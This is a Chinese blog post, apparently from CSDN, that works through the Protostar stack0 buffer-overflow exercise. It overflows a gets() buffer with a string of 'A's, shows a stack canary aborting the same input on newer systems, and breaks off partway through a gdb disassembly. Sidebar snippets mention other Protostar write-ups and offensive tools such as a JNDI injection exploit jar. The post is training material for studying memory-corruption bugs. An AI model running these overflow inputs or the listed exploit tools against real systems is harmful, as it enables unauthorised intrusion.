exploit-exercise的protostar之stack0

最新推荐文章于 2020-07-20 22:35:15 发布
最新推荐文章于 2020-07-20 22:35:15 发布
阅读量626 收藏
点赞数
分类专栏: 逆向 文章标签: 二进制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/75095063
版权

在官方提供的虚拟机中,使用系统已经编译好的二进制可执行文件,可以实现stack overflow

系统已经编译好的二进制文件

user@protostar:~/repos$ ls /opt/protostar/bin/
final0  final2   format1  format3  heap0  heap2  net0  net2  net4    stack1  stack3  stack5  stack7
final1  format0  format2  format4  heap1  heap3  net1  net3  stack0  stack2  stack4  stack6
user@protostar:/opt/protostar/bin$ echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"|./stack0
you have changed the 'modified' variable
user@protostar:/opt/protostar/bin$ uname -a
Linux protostar 2.6.32-5-686 #1 SMP Mon Oct 3 04:15:24 UTC 2011 i686 GNU/Linux

而如果使用源码进行编译,

使用源码编译得到的二进制文件

user@protostar:~/repos$ ls
stack0.c
user@protostar:~/repos$ gcc -o stack0 stack0.c
/tmp/ccojQDsp.o: In function `main':
stack0.c:(.text+0x19): warning: the `gets' function is dangerous and should not be used.
user@protostar:~/repos$ ls
stack0  stack0.c
user@protostar:~/repos$ python -c "print 'A'*64"|./stack0
[!] Tru again
user@protostar:~/repos$ python -c "print 'A'*65"|./stack0
[*] You have changed the 'modified' var

但是为什么这两个文件大小差这么多。

user@protostar:~/repos$ file /opt/protostar/bin/stack0
/opt/protostar/bin/stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
user@protostar:~/repos$ ls -alh /opt/protostar/bin/stack0
-rwsr-xr-x 1 root root 22K Nov 24  2011 /opt/protostar/bin/stack0
user@protostar:~/repos$ ls -alh stack0
-rwxr-xr-x 1 user user 4.6K Jul 13 22:19 stack0
user@protostar:~/repos$ file stack0
stack0: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

而不管是在我的Mac,虚拟机ubuntu-16.04-server上都不能成功。

ubuntu-16.04-server

ubuntu@VM-64-40-ubuntu:~/repos/test$ echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"|./stack0
[!] Tru again
*** stack smashing detected ***: ./stack0 terminated
Aborted (core dumped)

macOS

[master][~/CTF/Protostar/stack0]$ python -c "print 'A'*100"|./stack0                           [1:12:54]
warning: this program uses gets(), which is unsafe.
[!] Tru again
[1]    36582 done       python -c "print 'A'*100" |
       36583 abort      ./stack0

可见在旧系统上虽然自己手动编译时会有warning,

user@protostar:~/repos$ gcc -o stack0 stack0.c
/tmp/ccojQDsp.o: In function `main':
stack0.c:(.text+0x19): warning: the `gets' function is dangerous and should not be used.

但是依然是可以进行stack overflow的。
然而在新系统上不能实现,是什么原因呢,让我们在新系统(ubuntu-16.04-server)用gdb来调试一下吧。

使用gdb调试一下自己手动编译的二进制

ubuntu@VM-64-40-ubuntu:~/repos/test$ gdb ./stack0
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x00000000004005d6 <+0>: push   rbp
   0x00000000004005d7 <+1>: mov    rbp,rsp
   0x00000000004005da <+4>: sub    rsp,0x70
   0x00000000004005de <+8>: mov    DWORD PTR [rbp-0x64],edi
   0x00000000004005e1 <+11>:    mov    QWORD PTR [rbp-0x70],rsi
   0x00000000004005e5 <+15>:    mov    rax,QWORD PTR fs:0x28
   0x00000000004005ee <+24>:    mov    QWORD PTR [rbp-0x8],rax
   0x00000000004005f2 <+28>:    xor    eax,eax
   0x00000000004005f4 <+30>:    mov    DWORD PTR [rbp-0x54],0x0
   0x00000000004005fb <+37>:    lea    rax,[rbp-0x50]
   0x00000000004005ff <+41>:    mov    rdi,rax
   0x0000000000400602 <+44>:    mov    eax,0x0
   0x0000000000400607 <+49>:    call   0x4004c0 <gets@plt>
   0x000000000040060c <+54>:    mov    eax,DWORD PTR [rbp-0x54]
   0x000000000040060f <+57>:    test   eax,eax
   0x0000000000400611 <+59>:    je     0x400624 <main+78>
   0x0000000000400613 <+61>:    mov    edi,0x4006d8
   0x0000000000400618 <+66>:    call   0x400490 <puts@plt>
   0x000000000040061d <+71>:    mov    eax,0x0
   0x0000000000400622 <+76>:    jmp    0x400633 <main+93>
   0x0000000000400624 <+78>:    mov    edi,0x400700
   0x0000000000400629 <+83>:    call   0x400490 <puts@plt>
   0x000000000040062e <+88>:    mov    eax,0x1
   0x0000000000400633 <+93>:    mov    rdx,QWORD PTR [rbp-0x8]
   0x0000000000400637 <+97>:    xor    rdx,QWORD PTR fs:0x28
   0x0000000000400640 <+106>:   je     0x400647 <main+113>
   0x0000000000400642 <+108>:   call   0x4004a0 <__stack_chk_fail@plt>
   0x0000000000400647 <+113>:   leave
---Type <return> to continue, or q <return> to quit---

//TODO

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Exploit Exercises - Protostar Stack
u011500307的专栏
03-18 2734
这个网站是http://exploit-exercises.com/protostarStack 0: #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(
Exploit-Exercises-Protostar:漏洞利用解决方案 Protostar
07-07
Exploit-Exercises-Protostar 是一个专门为初学者和进阶者设计的实践平台,旨在帮助他们掌握漏洞利用的基本技巧和原理。在这个项目中,我们将深入探讨每个练习,揭示其中蕴含的安全知识点。 首先,Protostar 包含了...
Exploit练习Protostar——stack0
weixin_34226182的博客
04-30 153
简介   我们知道,当程序执行进入一个新的函数时,系统会为函数在栈上分配一块空间,用来存储函数中使用的参数和局部变量信息,用寄存器ESP和EBP指示空间范围,当从函数返回时,这块空间也会被抛弃,实际上就是修改ESP和EBP寄存器中的值。这个练习说明了变量在栈的分配情况,以及怎样突破ESP和EBP对空间的限制,修改分配空间外的数据,使得函数的执行逻辑发生变化。 源码 1 #include...
Protostar stack0
weixin_34174322的博客
04-11 117
AboutThis level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory ...
protostar_stack0
weixin_30593443的博客
07-06 107
这个网站上有很多关于攻击的练习,挺有意思:http://exploit-exercises.com 每种练习需要下载一个iso文件,在虚拟机中打开操作系统进行练习。 先看看protostar部分: 地址:http://exploit-exercises.com/protostar/stack0 输入64个以上的字符就能使它溢出,用objdump命令可以看到...
Exploit练习Protostar——stack4
weixin_33889245的博客
04-30 128
简介   这次练习只有buffer一个变量,所以不能再通过覆盖变量值应该程序执行逻辑了,这次我们可以直接覆盖main函数的返回地址,那么它的返回地址在哪里呢? 源码 1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <stdio.h> 4 #include <string....
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
linux-exploit-suggester:Linux特权升级审核工具
04-22
LES:Linux特权升级审核工具快速下载: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh有关LES用法和内部工作方式的详细信息: ...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
标题"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip"暗示了这是一个关于JNDI注入漏洞的exploit工具包,版本为1.0 SNAPSHOT,可能包含了多个利用示例或攻击代码。"all"可能表示该压缩包包含了所有相关的组件或测试...
Protostar heap0
weixin_34372728的博客
04-21 113
AboutThis level introduces heap overflows and how they can influence code flow.This level is at /opt/protostar/bin/heap0Source code#include <stdlib.h>#include <unistd.h>#include...
Exploit-ExerciseProtostar-heap
Yale的博客
07-20 738
0x00 Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。 本文将介绍heap部分。 关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录 查看ip 知道ip后可以在kali中ssh连上 输入user即可 机器上所有需要分析的程序都在如下路径 0x01 第一关heap0 这里可以看到存在缓冲区溢出的地方在d->n
Protostar final0
weixin_34348111的博客
04-30 220
Hints: depending on where you are returning to, you may wish to use a toupper() proof shellcode.Source code#include "../common/common.c"#define NAME "final0"#define UID 0#define GID 0#defin...
简单ROP exploit入门之protostar stack7
无心插柳
09-24 6979
通过protostar stack7来入门最简单的ROP exploit
Exploit-ExerciseProtostar-stack
Yale的博客
07-20 1406
0x00 Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。 本文将介绍stack部分。 关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录 查看ip 知道ip后可以在kali中ssh连上 输入user即可 机器上所有需要分析的程序都在如下路径 0x0 来看第一关stack0 源码如下 这题很简单,就是在if里判断mo
Exploit练习Protostar——stack1
weixin_34347651的博客
04-30 128
简介   上一个练习我们通过利用栈溢出漏洞修改了栈中变量modified的值,但是我们并没有控制将modified修改成什么值。在这个练习中我们会试图将modified修改为特定的值,这就需要我们了解变量在内存中是怎样存储的。 源码 1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <st...
传统栈溢出-(Exploit-exercise-protostar-stack5)
MillionSky的专栏
04-11 804
1 概述传统栈溢出有这些特点:没有ASLR没有NX 题目来自https://exploit-exercises.com/protostar/stack5/ 本来觉得很简单的,还是纠结了半天。Exploit-exercise-protostar-stack5的第一个坑就是setuid程序的core dump没有打开。需要这样操作:su - root #password:godmodeecho 1 &...
Protostar Format Write Up
无节操
11-22 1053
protostar format writeup
Protostar Heap Write Up
无节操
12-04 1287
protostar heap write up
linux-exploit-suggester2
最新发布
07-28
针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值